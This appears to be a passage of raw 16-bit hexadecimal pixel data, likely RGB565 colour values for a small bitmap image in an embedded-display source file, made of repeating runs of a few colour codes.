0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0x0000, 0x0000, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0x0000, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0x0000, 0x0000, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0x0000, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0x0000, 0x0000, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0x0000, 0x0000, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0x0000, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0x0000, 0x0000, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0x0000, 0xffff, 0xffff, 0xffff, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x0000, 0x0000, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0x0000, 0x0000, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0xffff, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0x0000, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0x0000, 0x0000, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0x0000, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 